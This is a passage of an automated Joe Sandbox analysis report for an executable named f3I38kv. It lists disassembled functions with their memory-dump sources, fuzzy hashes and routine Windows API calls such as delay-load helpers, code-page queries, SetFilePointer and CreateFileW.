                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 9579733a3faf3367803f42598ec03c2d5108239c0f4abd8b7bfd459abb9904fc
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 9579733a3faf3367803f42598ec03c2d5108239c0f4abd8b7bfd459abb9904fc
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 6b67e1cebb86c88c8f37988a6ab3c58a644654ab1ae48f56285ef863711c6054
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 6b67e1cebb86c88c8f37988a6ab3c58a644654ab1ae48f56285ef863711c6054
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 53e1ed55aa10ad76db79ab41d69d882d40502b80836062a83809812355fbeade
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 53e1ed55aa10ad76db79ab41d69d882d40502b80836062a83809812355fbeade
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: cc5456fb249a3aae30068dcd99b7a6e93e15e72b9462950fed166d6d1c333c64
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: cc5456fb249a3aae30068dcd99b7a6e93e15e72b9462950fed166d6d1c333c64
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 19e7753c5a16446b65bf9dfda569c9efc03bc39de2433e779e8cf2a8f49818ed
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 19e7753c5a16446b65bf9dfda569c9efc03bc39de2433e779e8cf2a8f49818ed
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E51F
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PDu<P
                                                            • API String ID: 1269201914-1790169076
                                                            • Opcode ID: 3295c91307fcaa54da7b01f9dc1dcfd5559abf99c1805dc0e9816a7d44004440
                                                            • Instruction ID: c34b8b03805b8aba5d711604d79d105b9c9b51615f84318ba1468fe79d2107a8
                                                            • Opcode Fuzzy Hash: 3295c91307fcaa54da7b01f9dc1dcfd5559abf99c1805dc0e9816a7d44004440
                                                            • Instruction Fuzzy Hash: C6A011E22A8802BCB00822082C0BC3F0E0EEACAF203308C2EF802800C2B8802C020830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E51F
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PDu<P
                                                            • API String ID: 1269201914-1790169076
                                                            • Opcode ID: 67142b52031f2d7260855fbe7469b7264bafa5db8622c0b65198de9c1f9a3f2b
                                                            • Instruction ID: c34b8b03805b8aba5d711604d79d105b9c9b51615f84318ba1468fe79d2107a8
                                                            • Opcode Fuzzy Hash: 67142b52031f2d7260855fbe7469b7264bafa5db8622c0b65198de9c1f9a3f2b
                                                            • Instruction Fuzzy Hash: C6A011E22A8802BCB00822082C0BC3F0E0EEACAF203308C2EF802800C2B8802C020830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E51F
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PDu<P
                                                            • API String ID: 1269201914-1790169076
                                                            • Opcode ID: a3bdc1c0e400dd7e44ab5fcf221af6052fcc75c2379b698d992d70c832fcc0f5
                                                            • Instruction ID: c34b8b03805b8aba5d711604d79d105b9c9b51615f84318ba1468fe79d2107a8
                                                            • Opcode Fuzzy Hash: a3bdc1c0e400dd7e44ab5fcf221af6052fcc75c2379b698d992d70c832fcc0f5
                                                            • Instruction Fuzzy Hash: C6A011E22A8802BCB00822082C0BC3F0E0EEACAF203308C2EF802800C2B8802C020830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E580
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: FjunP
                                                            • API String ID: 1269201914-2738844368
                                                            • Opcode ID: 63b451f04d782e42b3ee309181c8a45fc948e7b5f039e4f08ac29f0abb7d5a3f
                                                            • Instruction ID: ed6b41b26555aaca44f84d618bacc25d7b0ee1830d9900574b5ee21bfaf1cf10
                                                            • Opcode Fuzzy Hash: 63b451f04d782e42b3ee309181c8a45fc948e7b5f039e4f08ac29f0abb7d5a3f
                                                            • Instruction Fuzzy Hash: EAA012D21950113C700851603D0BC3F0D0DE9C1B113308E1DF400800C1684018050430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E51F
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PDu<P
                                                            • API String ID: 1269201914-1790169076
                                                            • Opcode ID: e50af5574f079c165b6cd6ed5eff30d5f316093a71fb139827e341bf9df46ece
                                                            • Instruction ID: c34b8b03805b8aba5d711604d79d105b9c9b51615f84318ba1468fe79d2107a8
                                                            • Opcode Fuzzy Hash: e50af5574f079c165b6cd6ed5eff30d5f316093a71fb139827e341bf9df46ece
                                                            • Instruction Fuzzy Hash: C6A011E22A8802BCB00822082C0BC3F0E0EEACAF203308C2EF802800C2B8802C020830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E580
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: FjunP
                                                            • API String ID: 1269201914-2738844368
                                                            • Opcode ID: 5eab6cd53a1e2d184909abb962325ba17cad85febe18e2a1c673ee96c5829b8d
                                                            • Instruction ID: 55429c0c7b60756424372addcc3436fff2c9995ff886d77c94071dd905026c88
                                                            • Opcode Fuzzy Hash: 5eab6cd53a1e2d184909abb962325ba17cad85febe18e2a1c673ee96c5829b8d
                                                            • Instruction Fuzzy Hash: 99A012D21590127C700851503D0BC3F0D0DE9C1B103308D1DF401800C1684018050430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E580
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: FjunP
                                                            • API String ID: 1269201914-2738844368
                                                            • Opcode ID: 4e25d9cd69d07d561dd8545f8fa3fe88540d7602272eef1f13cd97ed2be9f18a
                                                            • Instruction ID: 55429c0c7b60756424372addcc3436fff2c9995ff886d77c94071dd905026c88
                                                            • Opcode Fuzzy Hash: 4e25d9cd69d07d561dd8545f8fa3fe88540d7602272eef1f13cd97ed2be9f18a
                                                            • Instruction Fuzzy Hash: 99A012D21590127C700851503D0BC3F0D0DE9C1B103308D1DF401800C1684018050430
                                                            APIs
                                                              • Part of subcall function 0051B7BB: GetOEMCP.KERNEL32(00000000,?,?,0051BA44,?), ref: 0051B7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0051BA89,?,00000000), ref: 0051BC64
                                                            • GetCPInfo.KERNEL32(00000000,0051BA89,?,?,?,0051BA89,?,00000000), ref: 0051BC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 544a3329eb140045f6bbb3ec2eb7cea8e06f984ee8343356ea19d5874a0c9a90
                                                            • Instruction ID: 7ae776e14ba57a15452f659bf4ff3f7102c211545d187cb836730e770eae4c1e
                                                            • Opcode Fuzzy Hash: 544a3329eb140045f6bbb3ec2eb7cea8e06f984ee8343356ea19d5874a0c9a90
                                                            • Instruction Fuzzy Hash: F15135749002469EFB289F35C8857FABFF5FF42304F1844AED4968B292D7349985CB90
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,004F9A50,?,?,00000000,?,?,004F8CBC,?), ref: 004F9BAB
                                                            • GetLastError.KERNEL32(?,00000000,004F8411,-00009570,00000000,000007F3), ref: 004F9BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: ac4a475ffad7a80844827ca2e39f39db7280d14e5dd832a7851f59b4333e654b
                                                            • Instruction ID: b375855a3f1e1d36bbf3bcaced30ec76ffa7c71635f1f79846bd6d95967bb3c0
                                                            • Opcode Fuzzy Hash: ac4a475ffad7a80844827ca2e39f39db7280d14e5dd832a7851f59b4333e654b
                                                            • Instruction Fuzzy Hash: 5741CD30A043498BDB24DF15E58467BB7E5FFD5310F148A2FEA8183360D778BC498A59
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F1E55
                                                              • Part of subcall function 004F3BBA: __EH_prolog.LIBCMT ref: 004F3BBF
                                                            • _wcslen.LIBCMT ref: 004F1EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: acba8541be7cc85b7efbc2a0cf5c61ce45be36bc78ef8793ecf99cd89cec13b4
                                                            • Instruction ID: 9a8c86e73052a0c9738743250ba5cedb508b08e507c53706b0c0c3b576494b7a
                                                            • Opcode Fuzzy Hash: acba8541be7cc85b7efbc2a0cf5c61ce45be36bc78ef8793ecf99cd89cec13b4
                                                            • Instruction Fuzzy Hash: 2F316B71904209EFCF15EF99C955AEEBBF5BF48304F10006EE945A7261CB365E00CB65
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004F73BC,?,?,?,00000000), ref: 004F9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 004F9E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 4733a6c1c568a16c2cac273798cac508c63cd16c5271ed8971f0c5358d24b936
                                                            • Instruction ID: 1e73a8a0e289972e0f52e461f8d18969667d5331d9cda157369eb99c78efde3e
                                                            • Opcode Fuzzy Hash: 4733a6c1c568a16c2cac273798cac508c63cd16c5271ed8971f0c5358d24b936
                                                            • Instruction Fuzzy Hash: EA21EE3124824AABC714CF24C895BBBBBE8AF91304F08481EF5C583681D32CED0D9B66
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004F9F27,?,?,004F771A), ref: 004F96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,004F9F27,?,?,004F771A), ref: 004F9716
                                                            Memory Dump Source
